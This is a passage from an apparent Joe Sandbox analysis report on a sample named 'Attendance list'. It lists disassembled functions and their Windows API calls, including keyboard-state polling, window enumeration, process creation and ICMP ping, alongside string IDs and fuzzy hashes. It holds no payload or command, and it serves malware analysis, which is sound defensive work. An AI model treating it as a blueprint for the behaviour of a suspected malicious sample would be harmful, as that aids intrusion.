                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0092560B
                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0092561C
                        Similarity
                        • API ID: SendString$_memmove
                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                        • API String ID: 2279737902-1007645807
                        APIs
                        Similarity
                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                        • String ID: 0.0.0.0
                        • API String ID: 208665112-3771769585
                        APIs
                        • timeGetTime.WINMM ref: 0092521C
                          • Part of subcall function 008E0719: timeGetTime.WINMM(?,75A8B400,008D0FF9), ref: 008E071D
                        • Sleep.KERNEL32(0000000A), ref: 00925248
                        • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 0092526C
                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0092528E
                        • SetActiveWindow.USER32 ref: 009252AD
                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 009252BB
                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 009252DA
                        • Sleep.KERNEL32(000000FA), ref: 009252E5
                        • IsWindow.USER32 ref: 009252F1
                        • EndDialog.USER32(00000000), ref: 00925302
                        Similarity
                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                        • String ID: BUTTON
                        • API String ID: 1194449130-3405671355
                        APIs
                          • Part of subcall function 008C9997: __itow.LIBCMT ref: 008C99C2
                          • Part of subcall function 008C9997: __swprintf.LIBCMT ref: 008C9A0C
                        • CoInitialize.OLE32(00000000), ref: 0092D855
                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0092D8E8
                        • SHGetDesktopFolder.SHELL32(?), ref: 0092D8FC
                        • CoCreateInstance.OLE32(00952D7C,00000000,00000001,0097A89C,?), ref: 0092D948
                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0092D9B7
                        • CoTaskMemFree.OLE32(?,?), ref: 0092DA0F
                        • _memset.LIBCMT ref: 0092DA4C
                        • SHBrowseForFolderW.SHELL32(?), ref: 0092DA88
                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0092DAAB
                        • CoTaskMemFree.OLE32(00000000), ref: 0092DAB2
                        • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0092DAE9
                        • CoUninitialize.OLE32(00000001,00000000), ref: 0092DAEB
                        Similarity
                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                        • String ID:
                        • API String ID: 1246142700-0
                        APIs
                        • GetKeyboardState.USER32(?), ref: 009205A7
                        • SetKeyboardState.USER32(?), ref: 00920612
                        • GetAsyncKeyState.USER32(000000A0), ref: 00920632
                        • GetKeyState.USER32(000000A0), ref: 00920649
                        • GetAsyncKeyState.USER32(000000A1), ref: 00920678
                        • GetKeyState.USER32(000000A1), ref: 00920689
                        • GetAsyncKeyState.USER32(00000011), ref: 009206B5
                        • GetKeyState.USER32(00000011), ref: 009206C3
                        • GetAsyncKeyState.USER32(00000012), ref: 009206EC
                        • GetKeyState.USER32(00000012), ref: 009206FA
                        • GetAsyncKeyState.USER32(0000005B), ref: 00920723
                        • GetKeyState.USER32(0000005B), ref: 00920731
                        Similarity
                        • API ID: State$Async$Keyboard
                        • String ID:
                        • API String ID: 541375521-0
                        APIs
                        • GetDlgItem.USER32(?,00000001), ref: 0091C746
                        • GetWindowRect.USER32(00000000,?), ref: 0091C758
                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0091C7B6
                        • GetDlgItem.USER32(?,00000002), ref: 0091C7C1
                        • GetWindowRect.USER32(00000000,?), ref: 0091C7D3
                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0091C827
                        • GetDlgItem.USER32(?,000003E9), ref: 0091C835
                        • GetWindowRect.USER32(00000000,?), ref: 0091C846
                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0091C889
                        • GetDlgItem.USER32(?,000003EA), ref: 0091C897
                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0091C8B4
                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0091C8C1
                        Similarity
                        • API ID: Window$ItemMoveRect$Invalidate
                        • String ID:
                        • API String ID: 3096461208-0
                        APIs
                          • Part of subcall function 008C1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,008C2036,?,00000000,?,?,?,?,008C16CB,00000000,?), ref: 008C1B9A
                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 008C20D3
                        • KillTimer.USER32(-00000001,?,?,?,?,008C16CB,00000000,?,?,008C1AE2,?,?), ref: 008C216E
                        • DestroyAcceleratorTable.USER32(00000000), ref: 008FBEF6
                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008C16CB,00000000,?,?,008C1AE2,?,?), ref: 008FBF27
                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008C16CB,00000000,?,?,008C1AE2,?,?), ref: 008FBF3E
                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008C16CB,00000000,?,?,008C1AE2,?,?), ref: 008FBF5A
                        • DeleteObject.GDI32(00000000), ref: 008FBF6C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                        • String ID:
                        • API String ID: 641708696-0
                        APIs
                          • Part of subcall function 008C25DB: GetWindowLongW.USER32(?,000000EB), ref: 008C25EC
                        • GetSysColor.USER32(0000000F), ref: 008C21D3
                        Similarity
                        • API ID: ColorLongWindow
                        • String ID:
                        • API String ID: 259745315-0
                        APIs
                        • CharLowerBuffW.USER32(?,?,0094F910), ref: 0092AB76
                        • GetDriveTypeW.KERNEL32(00000061,0097A620,00000061), ref: 0092AC40
                        • _wcscpy.LIBCMT ref: 0092AC6A
                        Strings
                        Similarity
                        • API ID: BuffCharDriveLowerType_wcscpy
                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                        • API String ID: 2820617543-1000479233
                        APIs
                        Strings
                        Similarity
                        • API ID: __i64tow__itow__swprintf
                        • String ID: %.15g$0x%p$False$True
                        • API String ID: 421087845-2263619337
                        APIs
                        • _memset.LIBCMT ref: 009473D9
                        • CreateMenu.USER32 ref: 009473F4
                        • SetMenu.USER32(?,00000000), ref: 00947403
                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00947490
                        • IsMenu.USER32(?), ref: 009474A6
                        • CreatePopupMenu.USER32 ref: 009474B0
                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 009474DD
                        • DrawMenuBar.USER32 ref: 009474E5
                        Strings
                        Similarity
                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                        • String ID: 0$F
                        • API String ID: 176399719-3044882817
                        APIs
                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 009477CD
                        • CreateCompatibleDC.GDI32(00000000), ref: 009477D4
                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 009477E7
                        • SelectObject.GDI32(00000000,00000000), ref: 009477EF
                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 009477FA
                        • DeleteDC.GDI32(00000000), ref: 00947803
                        • GetWindowLongW.USER32(?,000000EC), ref: 0094780D
                        • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00947821
                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0094782D
                        Strings
                        Similarity
                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                        • String ID: static
                        • API String ID: 2559357485-2160076837
                        APIs
                        • _memset.LIBCMT ref: 008E707B
                          • Part of subcall function 008E8D68: __getptd_noexit.LIBCMT ref: 008E8D68
                        • __gmtime64_s.LIBCMT ref: 008E7114
                        • __gmtime64_s.LIBCMT ref: 008E714A
                        • __gmtime64_s.LIBCMT ref: 008E7167
                        • __allrem.LIBCMT ref: 008E71BD
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008E71D9
                        • __allrem.LIBCMT ref: 008E71F0
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008E720E
                        • __allrem.LIBCMT ref: 008E7225
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008E7243
                        • __invoke_watson.LIBCMT ref: 008E72B4
                        Similarity
                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                        • String ID:
                        • API String ID: 384356119-0
                        APIs
                        • _memset.LIBCMT ref: 00922A31
                        • GetMenuItemInfoW.USER32(00986890,000000FF,00000000,00000030), ref: 00922A92
                        • SetMenuItemInfoW.USER32(00986890,00000004,00000000,00000030), ref: 00922AC8
                        • Sleep.KERNEL32(000001F4), ref: 00922ADA
                        • GetMenuItemCount.USER32(?), ref: 00922B1E
                        • GetMenuItemID.USER32(?,00000000), ref: 00922B3A
                        • GetMenuItemID.USER32(?,-00000001), ref: 00922B64
                        • GetMenuItemID.USER32(?,?), ref: 00922BA9
                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00922BEF
                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00922C03
                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00922C24
                        Similarity
                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                        • String ID:
                        • API String ID: 4176008265-0
                        APIs
                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00947214
                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00947217
                        • GetWindowLongW.USER32(?,000000F0), ref: 0094723B
                        • _memset.LIBCMT ref: 0094724C
                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0094725E
                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 009472D6
                        Similarity
                        • API ID: MessageSend$LongWindow_memset
                        • String ID:
                        • API String ID: 830647256-0
                        APIs
                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00917135
                        • SafeArrayAllocData.OLEAUT32(?), ref: 0091718E
                        • VariantInit.OLEAUT32(?), ref: 009171A0
                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 009171C0
                        • VariantCopy.OLEAUT32(?,?), ref: 00917213
                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00917227
                        • VariantClear.OLEAUT32(?), ref: 0091723C
                        • SafeArrayDestroyData.OLEAUT32(?), ref: 00917249
                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00917252
                        • VariantClear.OLEAUT32(?), ref: 00917264
                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0091726F
                        Similarity
                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                        • String ID:
                        • API String ID: 2706829360-0
                        APIs
                        • WSAStartup.WSOCK32(00000101,?), ref: 00935AA6
                        • inet_addr.WSOCK32(?,?,?), ref: 00935AEB
                        • gethostbyname.WSOCK32(?), ref: 00935AF7
                        • IcmpCreateFile.IPHLPAPI ref: 00935B05
                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00935B75
                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00935B8B
                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00935C00
                        • WSACleanup.WSOCK32 ref: 00935C06
                        Strings
                        Similarity
                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                        • String ID: Ping
                        • API String ID: 1028309954-2246546115
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 0092B73B
                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0092B7B1
                        • GetLastError.KERNEL32 ref: 0092B7BB
                        • SetErrorMode.KERNEL32(00000000,READY), ref: 0092B828
                        Strings
                        Similarity
                        • API ID: Error$Mode$DiskFreeLastSpace
                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                        • API String ID: 4194297153-14809454
                        APIs
                          • Part of subcall function 008C7F41: _memmove.LIBCMT ref: 008C7F82
                          • Part of subcall function 0091B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0091B0E7
                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 009194F6
                        • GetDlgCtrlID.USER32 ref: 00919501
                        • GetParent.USER32 ref: 0091951D
                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00919520
                        • GetDlgCtrlID.USER32(?), ref: 00919529
                        • GetParent.USER32(?), ref: 00919545
                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00919548
                        Strings
                        Similarity
                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                        • String ID: ComboBox$ListBox
                        • API String ID: 1536045017-1403004172
                        APIs
                          • Part of subcall function 008C7F41: _memmove.LIBCMT ref: 008C7F82
                          • Part of subcall function 0091B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0091B0E7
                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 009195DF
                        • GetDlgCtrlID.USER32 ref: 009195EA
                        • GetParent.USER32 ref: 00919606
                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00919609
                        • GetDlgCtrlID.USER32(?), ref: 00919612
                        • GetParent.USER32(?), ref: 0091962E
                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00919631
                        Strings
                        Similarity
                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                        • String ID: ComboBox$ListBox
                        • API String ID: 1536045017-1403004172
                        APIs
                        • GetParent.USER32 ref: 00919651
                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00919666
                        • _wcscmp.LIBCMT ref: 00919678
                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 009196F3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        Similarity
                        • API ID: ClassMessageNameParentSend_wcscmp
                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                        • API String ID: 1704125052-3381328864
                        APIs
                        • VariantInit.OLEAUT32(?), ref: 00938BEC
                        • CoInitialize.OLE32(00000000), ref: 00938C19
                        • CoUninitialize.OLE32 ref: 00938C23
                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00938D23
                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00938E50
                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00952C0C), ref: 00938E84
                        • CoGetObject.OLE32(?,00000000,00952C0C,?), ref: 00938EA7
                        • SetErrorMode.KERNEL32(00000000), ref: 00938EBA
                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00938F3A
                        • VariantClear.OLEAUT32(?), ref: 00938F4A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        Similarity
                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                        • String ID:
                        • API String ID: 2395222682-0
                        APIs
                        • __swprintf.LIBCMT ref: 0092419D
                        • __swprintf.LIBCMT ref: 009241AA
                          • Part of subcall function 008E38D8: __woutput_l.LIBCMT ref: 008E3931
                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 009241D4
                        • LoadResource.KERNEL32(?,00000000), ref: 009241E0
                        • LockResource.KERNEL32(00000000), ref: 009241ED
                        • FindResourceW.KERNEL32(?,?,00000003), ref: 0092420D
                        • LoadResource.KERNEL32(?,00000000), ref: 0092421F
                        • SizeofResource.KERNEL32(?,00000000), ref: 0092422E
                        • LockResource.KERNEL32(?), ref: 0092423A
                        • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0092429B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        Similarity
                        • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                        • String ID:
                        • API String ID: 1433390588-0
                        APIs
                        • GetCurrentThreadId.KERNEL32 ref: 00921700
                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00920778,?,00000001), ref: 00921714
                        • GetWindowThreadProcessId.USER32(00000000), ref: 0092171B
                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00920778,?,00000001), ref: 0092172A
                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0092173C
                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00920778,?,00000001), ref: 00921755
                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00920778,?,00000001), ref: 00921767
                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00920778,?,00000001), ref: 009217AC
                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00920778,?,00000001), ref: 009217C1
                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00920778,?,00000001), ref: 009217CC
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        Similarity
                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                        • String ID:
                        • API String ID: 2156557900-0
                        APIs
                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 008CFC06
                        • OleUninitialize.OLE32(?,00000000), ref: 008CFCA5
                        • UnregisterHotKey.USER32(?), ref: 008CFDFC
                        • DestroyWindow.USER32(?), ref: 00904A00
                        • FreeLibrary.KERNEL32(?), ref: 00904A65
                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00904A92
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        Similarity
                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                        • String ID: close all
                        • API String ID: 469580280-3243417748
                        APIs
                        • EnumChildWindows.USER32(?,0091AA64), ref: 0091A9A2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        Similarity
                        • API ID: ChildEnumWindows
                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                        • API String ID: 3555792229-1603158881
                        APIs
                        • SetWindowLongW.USER32(?,000000EB), ref: 008C2EAE
                          • Part of subcall function 008C1DB3: GetClientRect.USER32(?,?), ref: 008C1DDC
                          • Part of subcall function 008C1DB3: GetWindowRect.USER32(?,?), ref: 008C1E1D
                          • Part of subcall function 008C1DB3: ScreenToClient.USER32(?,?), ref: 008C1E45
                        • GetDC.USER32 ref: 008FCF82
                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 008FCF95
                        • SelectObject.GDI32(00000000,00000000), ref: 008FCFA3
                        • SelectObject.GDI32(00000000,00000000), ref: 008FCFB8
                        • ReleaseDC.USER32(?,00000000), ref: 008FCFC0
                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 008FD04B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        Similarity
                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                        • String ID: U
                        • API String ID: 4009187628-3372436214
                        APIs
                          • Part of subcall function 008C2612: GetWindowLongW.USER32(?,000000EB), ref: 008C2623
                          • Part of subcall function 008C2344: GetCursorPos.USER32(?), ref: 008C2357
                          • Part of subcall function 008C2344: ScreenToClient.USER32(009867B0,?), ref: 008C2374
                          • Part of subcall function 008C2344: GetAsyncKeyState.USER32(00000001), ref: 008C2399
                          • Part of subcall function 008C2344: GetAsyncKeyState.USER32(00000002), ref: 008C23A7
                        • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0094C2E4
                        • ImageList_EndDrag.COMCTL32 ref: 0094C2EA
                        • ReleaseCapture.USER32 ref: 0094C2F0
                        • SetWindowTextW.USER32(?,00000000), ref: 0094C39A
                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0094C3AD
                        • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0094C48F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        Similarity
                        • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                        • API String ID: 1924731296-2107944366
                        APIs
                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0094F910), ref: 0093903D
                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0094F910), ref: 00939071
                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 009391EB
                        • SysFreeString.OLEAUT32(?), ref: 00939215
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        Similarity
                        • API ID: Free$FileLibraryModuleNamePathQueryStringType
                        • String ID:
                        • API String ID: 560350794-0
                        APIs
                        • _memset.LIBCMT ref: 0093F9C9
                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0093FB5C
                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0093FB80
                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0093FBC0
                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0093FBE2
                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0093FD5E
                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0093FD90
                        • CloseHandle.KERNEL32(?), ref: 0093FDBF
                        • CloseHandle.KERNEL32(?), ref: 0093FE36
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        Similarity
                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                        • String ID:
                        • API String ID: 4090791747-0
                        APIs
                          • Part of subcall function 009248AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009238D3,?), ref: 009248C7
                          • Part of subcall function 009248AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009238D3,?), ref: 009248E0
                          • Part of subcall function 00924CD3: GetFileAttributesW.KERNEL32(?,00923947), ref: 00924CD4
                        • lstrcmpiW.KERNEL32(?,?), ref: 00924FE2
                        • _wcscmp.LIBCMT ref: 00924FFC
                        • MoveFileW.KERNEL32(?,?), ref: 00925017
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        Similarity
                        • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                        • String ID:
                        • API String ID: 793581249-0
                        APIs
                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0094896E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        Similarity
                        • API ID: InvalidateRect
                        • String ID:
                        • API String ID: 634782764-0
                        APIs
                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 008FC547
                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 008FC569
                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 008FC581
                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 008FC59F
                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 008FC5C0
                        • DestroyIcon.USER32(00000000), ref: 008FC5CF
                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 008FC5EC
                        • DestroyIcon.USER32(?), ref: 008FC5FB
                          • Part of subcall function 0094A71E: DeleteObject.GDI32(00000000), ref: 0094A757
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        Similarity
                        • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                        • String ID:
                        • API String ID: 2819616528-0
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00918A84,00000B00,?,?), ref: 00918E0C
                        • HeapAlloc.KERNEL32(00000000,?,00918A84,00000B00,?,?), ref: 00918E13
                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00918A84,00000B00,?,?), ref: 00918E28
                        • GetCurrentProcess.KERNEL32(?,00000000,?,00918A84,00000B00,?,?), ref: 00918E30
                        • DuplicateHandle.KERNEL32(00000000,?,00918A84,00000B00,?,?), ref: 00918E33
                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00918A84,00000B00,?,?), ref: 00918E43
                        • GetCurrentProcess.KERNEL32(00918A84,00000000,?,00918A84,00000B00,?,?), ref: 00918E4B
                        • DuplicateHandle.KERNEL32(00000000,?,00918A84,00000B00,?,?), ref: 00918E4E
                        • CreateThread.KERNEL32(00000000,00000000,00918E74,00000000,00000000,00000000), ref: 00918E68
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        Similarity
                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                        • String ID:
                        • API String ID: 1957940570-0
                        • Opcode ID: 23d4c287d42ed457027b91fbbba8fcacb0e48f5cd46e5e93d952d68fabe8c3fe
                        • Instruction ID: f85e72a1b332d32650e7dc040e6fe0b89bbc0b5af87768017c716ac763f21525
                        • Opcode Fuzzy Hash: 23d4c287d42ed457027b91fbbba8fcacb0e48f5cd46e5e93d952d68fabe8c3fe
                        • Instruction Fuzzy Hash: 0801BBB9258309FFE710ABA5DC4DF6B3BACEB89711F004421FA05DB1A1CA709800DB60
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Variant$ClearInit$_memset
                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                        • API String ID: 2862541840-625585964
                        • Opcode ID: 360672f64dd6497fefeebaaf98914605ebb2a0bacd1aa33e6d21c5d330a00e8a
                        • Instruction ID: 5ed66bd94d4b08be097948a85084f7989fefe62be88b66392cd30e7cc565452c
                        • Opcode Fuzzy Hash: 360672f64dd6497fefeebaaf98914605ebb2a0bacd1aa33e6d21c5d330a00e8a
                        • Instruction Fuzzy Hash: 5891D171A00219AFDF24DFA5C849FAFB7B8EF85314F108559F909AB290D7B09945CFA0
                        APIs
                          • Part of subcall function 00917652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0091758C,80070057,?,?,?,0091799D), ref: 0091766F
                          • Part of subcall function 00917652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0091758C,80070057,?,?), ref: 0091768A
                          • Part of subcall function 00917652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0091758C,80070057,?,?), ref: 00917698
